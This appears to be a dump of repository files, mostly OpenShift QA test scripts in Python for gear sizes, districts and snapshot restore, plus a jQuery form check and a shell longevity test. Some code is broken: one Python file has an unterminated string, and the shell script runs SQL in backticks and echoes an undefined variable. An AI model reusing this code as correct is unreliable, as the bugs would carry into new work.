f.close()\n os.umask(oldumask)\n except Exception as e:\n if os.path.exists(filename):\n os.unlink(filename)\n print \"ERROR: Unable to store cache %s\"%str(e)\n\n def _get_cache_collection(self, cname):\n filename=self._get_cache_file(cname)\n try:\n f = open(filename, 'rb')\n dump = pickle.load(f)\n f.close()\n if dump is None:\n raise Exception(\"None found in cache!\")\n return dump\n except Exception as e:\n print \"ERROR: Unable to load from cache %s\"%str(e)\n #let's delete corrupetd file if exists\n if os.path.exists(filename):\n os.unlink(filename)\n return None\n\n def get_collection(self, collection):\n if (self.collections.has_key(collection)):\n return self.collections[collection]\n else:\n self.collections[collection] = self._init_collection(collection)\n self._do_cache_collection(collection)\n return self.collections[collection]\n\n def _init_collection(self, collection, filter=None):\n if filter:\n cmd = \"db.%s.find(%s)\"%(collection, filter)\n else:\n cmd = \"db.%s.find()\"%collection\n return self._mongo(cmd)\n\n def _mongo(self, cmd):\n \"\"\"\n Returns json format of MONGO's output\n \"\"\"\n cmd = \"\"\"mongo --quiet %s <<EOF\n printjson(%s.toArray());\nEOF\"\"\"%(self.dbs, cmd)\n (status, output) = helper.remote_batch(cmd)\n if status != 0:\n raise Exception(\"Unable to get mongo dump from broker.\")\n #workaround because of bug in paramiko - slow transfer of large files\n\n try:\n output = output.strip()\n output = output.strip('bye')\n output = re.sub('^bye$','', output, re.MULTILINE)\n output = re.sub(r'ISODate\\((\"[^\"]+\")\\)',r'\\1', output)\n output = output.strip()\n return json.loads(output)\n except Exception as e:\n print \"ERROR: %s\"%str(e)\n print \"OUTPUT:\\n%s\",output\n return None\n\n def get_nodes_per_district(self, district):\n l = {}\n for district in self.collection['district']:\n name = district['name']\n l[name] = self.collections['district']['server_identities']\n return l\n\n\n" }, { "alpha_fraction": 0.645283043384552, "alphanum_fraction": 0.646792471408844, "avg_line_length": 29.813953399658203, "blob_id": "37f0b2b65dd444964705b31e3c4ac1352cf7fe8a", "content_id": "fc789314e02608d75d182a58abfd94d75aad22c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1325, "license_type": "no_license", "max_line_length": 99, "num_lines": 43, "path": "/automation/open/testmodules/RT/quick_start/quick_start_spring_eap6.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\n\nclass QuickStartBookmarks(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"jbosseap\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: spring-eap6-quickstart\"\n self.config.git_upstream_url = \" git://github.com/openshift/spring-eap6-quickstart.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"Spring MVC Starter Application\"\n \n def post_configuration_steps(self):\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git rm src/main/webapp/index.html\",\n \"git commit -m 'Removed default index.html'\"\n ]\n common.command_get_status(\" && \".join(steps))\n \t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartBookmarks)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.4202180504798889, "alphanum_fraction": 0.4311199188232422, "avg_line_length": 29.57575798034668, "blob_id": "7df43feade60b3a44972c5aefd8c5b3ac4855f46", "content_id": "41840a51c69f251b5fb53bf79ea09dfc47c158ef", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "JavaScript", "length_bytes": 1009, "license_type": "no_license", "max_line_length": 73, "num_lines": 33, "path": "/jquerydev/1_userverify/js/user_verify.js", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "$(document).ready(function(){\n // text verification\n $(\"#verify_btn\").click(function(){\n // alert(\"hello\");\n var text_value = $(\"#user_name\").val();\n if (text_value == \"\") {\n alert(\"Pls input sth...\");\n }\n else {\n alert(\"congratulations!!!\");\n /*\n var base_url = \"http://127.0.0.1:8080/jquerydev/1_userverify\"\n var ajax_url = base_url + \"?text_value=\" \n + encodeURI(encodeURI(text_value))\n $.get(\"\", null, function(reponse){\n //get the callback value, and fill it to result div\n $(\"#result\").html(reponse);\n });\n */\n }\n });\n\n //add keyup for text.\n $(\"#user_name\").keyup(function(){\n var text_value = $(\"#user_name\").val();\n if (text_value == \"\") {\n $(this).addClass(\"user_text\");\n }\n else {\n $(this).removeClass(\"user_text\");\n }\n });\n});\n" }, { "alpha_fraction": 0.6733333468437195, "alphanum_fraction": 0.6959999799728394, "avg_line_length": 36.5, "blob_id": "6259b02de1a5ed3f308d8347f13c50000d208278", "content_id": "15f54c39b26ecfba76e124f072e58076522fd2c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 750, "license_type": "no_license", "max_line_length": 154, "num_lines": 20, "path": "/automation/open/Longevity/basic_test.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "###step 1 : Create app\napp_create $1\nurl_check $app_name\n\n###step 2 : hot_deploy \n./hot_deply.sh $app_name\n\n###step 3 : cartridge_add mysql\nrun cartridge_add mysql-5.1 $app_name\n\n###step 4 : mysql insert\napp_path=`rhc app show -a $1 -p$passwd|grep -A0 \"SSH:\"|awk '{print $2}'`\necho \"$1 SSH path is : $app_path\"\ncartridge_dir=`ssh $app_path env|grep OPENSHIFT_PRIMARY_CARTRIDGE_DIR|cut -d'=' -f2`\ninsert_sql=`create table test(id int(8), name char(20));insert into test values('0','openshifit');insert into test values('1','nsun');select * from test;`\nssh $app_path \"echo '$aaa' > '$cartridge_dir'/mysql_insert.sql\"\n\n###step* : app operation test\napp_operations=\"status start restart reload stop force-stop tidy delete\"\nrun app_oper_testing $app_name\n" }, { "alpha_fraction": 0.4703063368797302, "alphanum_fraction": 0.48485368490219116, "avg_line_length": 41.340579986572266, "blob_id": "0219a9b54359dcac5117db13812837543f41a075", "content_id": "b499b5a902c5b834e5bbfadae9c7e5a85077cf81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5843, "license_type": "no_license", "max_line_length": 300, "num_lines": 138, "path": "/automation/open/testmodules/RT/node/gear_size.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\n\"\"\"\nimport common, OSConf\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = 'DEV'\n\n def initialize(self):\n self.info(\"[US1373][UI][CLI] Pick gear size + [US1908][BusinessIntegration][Marketing]Allotment: Small and medium gears\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = \"php\"\n self.app_type = common.app_types[self.test_variant]\n self.app_name = \"my%s\" % ( common.getRandomString() )\n common.env_setup()\n\n def finalize(self):\n self.gear_and_user_revert()\n\n\nclass GearSize(OpenShiftTest):\n def verify_cgroup_threshold(self, app_name, gear_size):\n\n thresholds = {\n \"small\" : { \"memory\" : 536870912, \"swap\" : 641728512, \"cpu\" : 128 },\n \"medium\" : { \"memory\" : 1073741824, \"swap\" : 1178599424, \"cpu\" : 128 },\n #\"large\" : { \"memory\" : 2147483648, \"swap\" : 2252341248, \"cpu\" : 128 }, #not supported\n }\n uuid = OSConf.get_app_uuid(app_name)\n\n if common.get_cgroup_threshold(uuid, \"memory\", \"limit_in_bytes\") == thresholds[gear_size][\"memory\"] and common.get_cgroup_threshold(uuid, \"memory\", \"memsw.limit_in_bytes\") == thresholds[gear_size][\"swap\"] and common.get_cgroup_threshold(uuid, \"cpu\", \"shares\") == thresholds[gear_size][\"cpu\"]:\n return True # Success, it's a Python function\n else:\n return False # Failure\n\n def gear_and_user_revert(self):\n common.change_node_profile(\"small\")\n common.remove_gearsize_capability('medium') #default\n\n def test_method(self):\n\n for gear_size in [ \"small\", \"medium\" ]:\n self.add_step(\"Changing the node profile to %s\" % ( gear_size ),\n common.change_node_profile,\n function_parameters = [ gear_size ],\n expect_description = \"Node profile must be changed successfully\",\n expect_return = 0)\n\n self.add_step(\n \"Creating application with gear size '%s'\" % ( gear_size ),\n common.create_app,\n function_parameters = [ self.app_name + gear_size, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False, \n \"./\", \n False, \n gear_size ],\n expect_description = \"The application must be created successfully\",\n expect_return = 0,\n try_count=3,\n try_interval=10)\n\n self.add_step(\n \"Verifying that resource limits are applied for cgroups\",\n self.verify_cgroup_threshold,\n function_parameters = [ self.app_name + gear_size, gear_size],\n expect_description = \"Cgroup thresholds must match\",\n expect_return = True) # This is a Python function\n\n self.add_step(\n \"Destroying the application with gear size '%s'\" % ( gear_size ),\n common.destroy_app,\n function_parameters = [ self.app_name + gear_size, self.user_email, self.user_passwd ],\n expect_description = \"The application must be destroyed successfully\",\n expect_return = 0)\n\n if gear_size == \"small\":\n\n for larger_gear_size in [ \"medium\" ]:\n self.add_step(\n \"Creating an application with gear size '%s' without medium_profile capability flag\" % ( larger_gear_size ),\n common.create_app,\n function_parameters = [ self.app_name + \"0\" + larger_gear_size, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False, \n \"./\", \n False, \n larger_gear_size ],\n expect_description = \"The operation must fail\",\n #expect_str = [\"Invalid Size\"],\n expect_return = \"!0\")\n\n self.add_step(\n \"Setting medium_capability flag\",\n common.add_gearsize_capability,\n function_parameters = [ 'medium'],\n expect_description = \"gearsize MEDIUM capability must be configured successfully\",\n expect_return = 0)\n\n self.add_step(\"Creating an application with an invalid gear size\",\n common.create_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False, \n \"./\", \n False, \n \"smallXXXXXX\" ],\n expect_description = \"The creation of the application must fail\",\n expect_return = \"!0\")\n\n self.run_steps()\n \n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(GearSize)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.4098873734474182, "alphanum_fraction": 0.44847726821899414, "avg_line_length": 37.34400177001953, "blob_id": "3c9989d0237514c6cfb6ea93381187b432cf7b4a", "content_id": "359e983b59c0e71ff1dfe791dd83c4f110b19c45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4794, "license_type": "no_license", "max_line_length": 117, "num_lines": 125, "path": "/automation/open/lib/common/consts.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\nfrom helper import get_instance_ip\n\nif os.environ.has_key('RHTEST_ORIGIN') and os.environ['RHTEST_ORIGIN'] == '1':\n app_types = {\n 'php' : 'php-5.4',\n 'ruby' : 'ruby-1.9',\n 'ruby-1.9' : 'ruby-1.9',\n 'rack' : 'ruby-1.9', #for backward compatibility...\n 'python' : 'python-2.7',\n 'python-3.3' : 'python-3.3',\n 'perl' : 'perl-5.16' ,\n 'raw' : 'diy-0.1',\n 'diy' : 'diy-0.1',\n 'nodejs' : 'nodejs-0.6',\n 'jenkins' : 'jenkins-1.4'}\n cartridge_types = {\n 'mongodb' : 'mongodb-2.2',\n 'mongo' : 'mongodb-2.2',\n 'cron' : 'cron-1.4',\n 'mysql' : 'mysql-5.1',\n 'postgresql' : 'postgresql-9.2',\n '10gen' : '10gen-mms-agent-0.1',\n 'phpmyadmin' : 'phpmyadmin-3.4',\n 'metrics' : 'metrics-0.1',\n 'phpmoadmin' : 'phpmoadmin-1.0',\n 'switchyard' : 'switchyard-0.6',\n 'haproxy' : 'haproxy-1.4 ',\n 'jenkins-client': 'jenkins-client-1.4',\n 'jenkins' : 'jenkins-client-1.4'}\nelse:\n app_types = { 'jbossas': 'jbossas-7',\n 'jbosseap-6.0': 'jbosseap-6.0',\n 'jbosseap': 'jbosseap-6.0',\n 'jbossews': 'jbossews-1.0',\n 'jbossews-1.0': 'jbossews-1.0',\n 'jbossews-2.0': 'jbossews-2.0',\n 'jbossews2': 'jbossews-2.0',\n 'php': 'php-5.3',\n 'ruby': 'ruby-1.8',\n 'ruby-1.8': 'ruby-1.8',\n 'ruby-1.9': 'ruby-1.9',\n 'rack': 'ruby-1.8', #for backward compatibility...\n 'python': 'python-2.6',\n 'python-2.6': 'python-2.6',\n 'python27': 'python-2.7',\n 'python-2.7':'python-2.7',\n 'python-3.3':'python-3.3',\n 'wsgi': 'python-2.6', #for backward compatibility...\n 'perl-5.10': 'perl-5.10',\n 'perl': 'perl-5.10' ,\n 'raw': 'diy-0.1',\n 'diy': 'diy-0.1',\n 'diy-0.1': 'diy-0.1',\n 'nodejs-0.6': 'nodejs-0.6',\n 'nodejs': 'nodejs-0.6',\n 'jenkins' : 'jenkins-1.4',\n 'zend' : 'zend-5.6'}\n cartridge_types = { 'mongodb' : 'mongodb-2.2',\n 'mongodb2.0' : 'mongodb-2.0',\n 'cron': 'cron-1.4', \n 'mysql': 'mysql-5.1', \n 'postgresql' : 'postgresql-8.4', \n '10gen' : '10gen-mms-agent-0.1', \n 'phpmyadmin': 'phpmyadmin-3.4', \n 'haproxy': 'haproxy-1.4', \n 'metrics' : 'metrics-0.1', \n 'phpmoadmin' : 'phpmoadmin-1.0', \n 'rockmongo': 'rockmongo-1.1', \n 'jenkins' : 'jenkins-client-1.4'}\n\nAPP_TYPES = app_types\nCARTRIDGE_TYPES = cartridge_types\n\ncartridge_deps = {'10gen': 'mongodb', \n 'phpmyadmin': 'mysql', \n 'phpmoadmin': 'mongodb', \n 'rockmongo': 'mongodb'}\n\nCARTRIDGE_DEPS = cartridge_deps\n\nAPP_SUFFIX = {\"php\": \".php\",\n \"nodejs\": '.js',\n \"ruby\": \".rb\",\n \"ruby-1.9\" : \".rb\",\n \"rack\": \".rb\",\n \"jbossas\": \".jsp\",\n \"jbosseap\": \".jsp\",\n \"jbossews\": \".jsp\",\n \"perl\": \".pl\",\n \"python\": \".py\",\n \"wsgi\": \".py\"}\n\n\nMAX_GEARS = 3 # normal max gears count\nDEV_MAX_GEARS = 20 # max gears count used for testing on DEV\n\nRHC_CLIENT_TIMEOUT = 360\n\ninstance_ip = get_instance_ip()\nif instance_ip == 'int.openshift.redhat.com':\n run_mode = 'INT'\nelif instance_ip == 'stg.openshift.redhat.com':\n run_mode = 'STG'\nelif instance_ip == 'openshift.redhat.com':\n run_mode = 'PROD'\nelif instance_ip.find(\"example.com\") != -1 or instance_ip.find(\"test.com\") != -1 or instance_ip.find(\"broker\") != -1:\n run_mode = 'OnPremise'\nelse:\n run_mode = 'DEV'\n\nif os.environ.has_key('RHTEST_RHC_CLIENT_OPTIONS'):\n RHTEST_RHC_CLIENT_OPTIONS = os.getenv('RHTEST_RHC_CLIENT_OPTIONS')\nelse:\n RHTEST_RHC_CLIENT_OPTIONS = \"--insecure --timeout %s\"% RHC_CLIENT_TIMEOUT\n# if run_mode in ('DEV', 'INT'):\n# RHTEST_RHC_CLIENT_OPTIONS = \"--insecure --timeout %s\"% RHC_CLIENT_TIMEOUT\n# else:\n# RHTEST_RHC_CLIENT_OPTIONS = \"--timeout %s\"% RHC_CLIENT_TIMEOUT\n\n# For all of the network operations:\nif os.getenv('RHTEST_REST_TIMEOUT'):\n CONNECT_TIMEOUT=os.getenv('RHTEST_REST_TIMEOUT')\nelse:\n CONNECT_TIMEOUT=360\n\n" }, { "alpha_fraction": 0.5941835641860962, "alphanum_fraction": 0.6136606335639954, "avg_line_length": 34.68571472167969, "blob_id": "0821ef5fb0f622e56f016b464ea9b7e70b8323fe", "content_id": "df5aef71d8d2639a14491aaa71dcbb54dbbe7d5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3748, "license_type": "no_license", "max_line_length": 99, "num_lines": 105, "path": "/automation/open/testmodules/RT/node/DeployAppInto1districtComprisedOfMultiNodes.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: DeployAppInto1districtComprisedOfMultiNodes.py\n# Date: 2012/08/29 11:36\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\nimport OSConf\nimport brokerdb\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = [\"DEV\"]\n\n def initialize(self):\n self.info(\"DeployAppInto1districtComprisedOfMultiNodes\")\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name1 = common.getRandomString(10)\n self.app_name2 = common.getRandomString(10)\n self.district_name = common.getRandomString(10)\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass DeployAppInto1districtComprisedOfMultiNodes(OpenShiftTest):\n def test_method(self):\n self.info(\"Creating new district...\")\n (ret, output) = common.create_district(self.district_name)\n self.assert_equal(0, ret, \"Unable to create district:%s\")\n\n nodes = common.get_nodes()\n pnodes=[]\n for node in nodes:\n pnodes.append(common.get_public_ip_from_private(node))\n self.assert_true((len(nodes)>=2), \"There must be at least 2 ndoes...\")\n for node in nodes:\n ret = common.add_node2district(self.district_name,node)\n self.assert_equal(0, ret, \"Error during adding node into district\")\n #Creating 1st app\n self.info(\"Creating app#1...\")\n (ret, status) = self.config.rest_api.app_create(self.app_name1, \n common.app_types[self.test_variant])\n self.assert_equal('Created', ret, \"Error during creating app#1 - %s\"%self.app_name1)\n self.info(\"Waiting...\")\n common.sleep(90)\n self.info(\"Creating app#2...\")\n (ret,status) = self.config.rest_api.app_create(self.app_name2, \n common.app_types[self.test_variant])\n self.assert_equal('Created', ret, \"Error during creating app#2 - %s\"%self.app_name2)\n (gear_group1, gear_count) = self.config.rest_api.get_gears(self.app_name1)\n app1_gear=gear_group1[0]['gears'][0]['id']\n (gear_group2, gear_count) = self.config.rest_api.get_gears(self.app_name2)\n app2_gear=gear_group2[0]['gears'][0]['id']\n gears={}\n print \"*\"*80\n for node in pnodes:\n gears[node] = common.get_gears_per_node(node)\n if gears[node].has_key(app1_gear):\n print \"\\tApp1's gear[%s] is deployed on %s\"%(app1_gear, node)\n app1_node=node\n if gears[node].has_key(app2_gear):\n print \"\\tApp2's gear[%s] is deployed on %s\"%(app2_gear, node)\n app2_node=node\n print \"*\"*80\n self.assert_true((app1_node!=app2_node), \"App1 should not reside on the same node as App2\")\n '''\n db = brokerdb.BrokerDB(collections = ['district'])\n districts = db.get_collection('district')\n print \"DISTRICTS: [UUID | NAME | NODES]\"\n for district in districts:\n #print district.keys()\n print \"\\t\",district['uuid'], district['name'], district['server_identities']\n print uuid1,uuid2\n '''\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DeployAppInto1districtComprisedOfMultiNodes)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of DeployAppInto1districtComprisedOfMultiNodes.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5114549398422241, "alphanum_fraction": 0.5211706757545471, "avg_line_length": 41.53571319580078, "blob_id": "29bb558de642ded35e650027f789a9ead6f9760f", "content_id": "898bd25c7cf27366c031caadcd7581be0b46b12e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8337, "license_type": "no_license", "max_line_length": 198, "num_lines": 196, "path": "/automation/open/testmodules/RT/client/snapshot_restore_data_dir_to_existing_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n try:\n self.test_variant = self.config.test_variant\n except:\n print \"OPENSHIFT_test_name environment variable is not set. Running test with default php\"\n self.test_variant = \"zend\"\n\n self.app_type = common.app_types[self.test_variant]\n self.app_name = self.test_variant.split('-')[0] + common.getRandomString(5)\n tcms_testcase_id = 107695\n if self.test_variant == \"perl\":\n file_name = \"index.pl\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/perl/index.pl\" %(self.app_name)\n url_path1 = \"index.pl?action=create\"\n url_path2 = \"index.pl?action=modify\"\n url_path3 = \"index.pl\"\n elif self.test_variant in (\"php\", \"zend\"):\n file_name = \"index.php\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/php/index.php\" %(self.app_name)\n url_path1 = \"index.php?action=create\"\n url_path2 = \"index.php?action=modify\"\n url_path3 = \"index.php\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n file_name = \"rack/*\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python\", \"wsgi\"):\n file_name = \"application.py\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant == \"python-2.7\":\n file_name = \"applicationpython-2.7.py\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant == \"python-3.3\":\n file_name = \"applicationpython-3.3.py\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\", \"jbossews\", \"jbossews2\"):\n file_name = \"test.jsp\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/src/main/webapp/%s\" %(self.app_name, file_name)\n url_path1 = \"%s?action=create\" %(file_name)\n url_path2 = \"%s?action=modify\" %(file_name)\n url_path3 = \"%s\" %(file_name)\n else:\n raise rhtest.TestIncompleteError(\"Uknown variant name\")\n\n self.file_name = file_name\n self.target_file = target_file\n self.source_file = source_file\n self.url_path1 = url_path1\n self.url_path2 = url_path2\n self.url_path3 = url_path3\n \n tcms_testcase_id=107695\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass SnapshotRestoreDataDirToExistingApp(OpenShiftTest):\n def test_method(self):\n\n step = testcase.TestCaseStep(\"Create a %s application\" %(self.app_type),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_return=0,\n expect_description=\"App should be created successfully\"\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Copying test files to app git repo\",\n \"cp -f %s %s\" %(self.source_file, self.target_file),\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Do git commit\",\n \"cd %s && git add . && git commit -m test && git push\" %(self.app_name),\n expect_return=0,\n expect_description=\"File and directories are added to your git repo successfully\"\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Get app url\",\n OSConf.get_app_url,\n function_parameters = [self.app_name]\n )\n self.steps_list.append(step)\n\n def verify(suffix, str_l):\n url=OSConf.get_app_url(self.app_name)\n return common.grep_web_page(\"%s/%s\"%(url,suffix), str_l )\n\n step = testcase.TestCaseStep(\"Access app's URL to create files in OPENSHIFT_DATA_DIR directory\",\n verify,\n function_parameters=[self.url_path1, [\"Welcome\", \"RESULT=0\"]],\n expect_return=0,\n try_interval=12,\n try_count=10)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Take snapshot\",\n \"rhc snapshot save %s -f %s -l %s -p %s %s\" %(self.app_name, \"%s.tar.gz\"%(self.app_name), self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Access app's URL to modify files in OPENSHIFT_DATA_DIR directory\",\n verify,\n function_parameters=[self.url_path2, [\"Welcome\", \"RESULT=0\"]],\n expect_return=0,\n try_interval=12,\n try_count=10\n )\n# self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Restore app from snapshot\",\n \"rhc snapshot restore %s -f %s -l %s -p '%s' %s\" %(self.app_name, \"%s.tar.gz\"%(self.app_name), self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0\n )\n self.steps_list.append(step)\n\n\n step = testcase.TestCaseStep(\"Access app's URL to check OPENSHIFT_DATA_DIR dir is restored\",\n verify,\n function_parameters=[self.url_path3, [\"Welcome\", \"snapshot_restore_data_dir_test1\"]],\n expect_return=0,\n try_interval=12,\n try_count=10\n )\n self.steps_list.append(step)\n\n\n case = testcase.TestCase(\"[US566][rhc-client] Archive/Restore data to updated application\\n[rhc-client]Create snapshot using rhc snapshot\",\n self.steps_list\n )\n case.run()\n\n\t\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreDataDirToExistingApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6038035154342651, "alphanum_fraction": 0.6188589334487915, "avg_line_length": 20.016666412353516, "blob_id": "4ff99ffad4f8e90aa243fbd27d8aacfc3ef960ac", "content_id": "1c4d57f05c481e22fac363bc1cdb28f872bcac15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1262, "license_type": "no_license", "max_line_length": 71, "num_lines": 60, "path": "/automation/open/testmodules/UI/web/create_domain.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: create_domain.py\n# Date: 2012/07/04 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Create_Domain(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n time.sleep(5)\n \n #Create domain name\n web.go_to_domain_edit()\n time.sleep(3)\n web.input_by_id(\"domain_name\", web.config.OPENSHIFT_user_email)\n web.click_element_by_id(\"domain_submit)\n time.sleep(20)\n web.assert_text_equal_by_xpath('Your domain has been created',\n '''//div[@id='flash']/div''')\n\n self.tearDown()\n\n return self.passed(\"Create domain name finished.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Create_Domain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of create_domain.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.689230740070343, "alphanum_fraction": 0.689230740070343, "avg_line_length": 33.21052551269531, "blob_id": "6f50417ebad3b22646dc0fd902db512ffdef0b21", "content_id": "1c99a0a95fb04e2f346ebe91edfaacc34c7d9563", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 650, "license_type": "no_license", "max_line_length": 71, "num_lines": 19, "path": "/automation/open/testmodules/RT/cartridge/app_template/django_custom/mydiyapp/urls.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from django.conf.urls.defaults import patterns, include, url\nimport djangotools\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'myrawapp.views.home', name='home'),\n # url(r'^myrawapp/', include('myrawapp.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n url(r'^version/', 'djangotools.views.display_version'),\n)\n" }, { "alpha_fraction": 0.6017287373542786, "alphanum_fraction": 0.6130319237709045, "avg_line_length": 27.903846740722656, "blob_id": "8ca923c66432371d69958da2e2fded3c510dc8e9", "content_id": "7bbe28d80aac7a023e12735553af50a11b14e27e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1504, "license_type": "no_license", "max_line_length": 102, "num_lines": 52, "path": "/automation/open/testmodules/RT/cartridge/jbossews_java7.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": 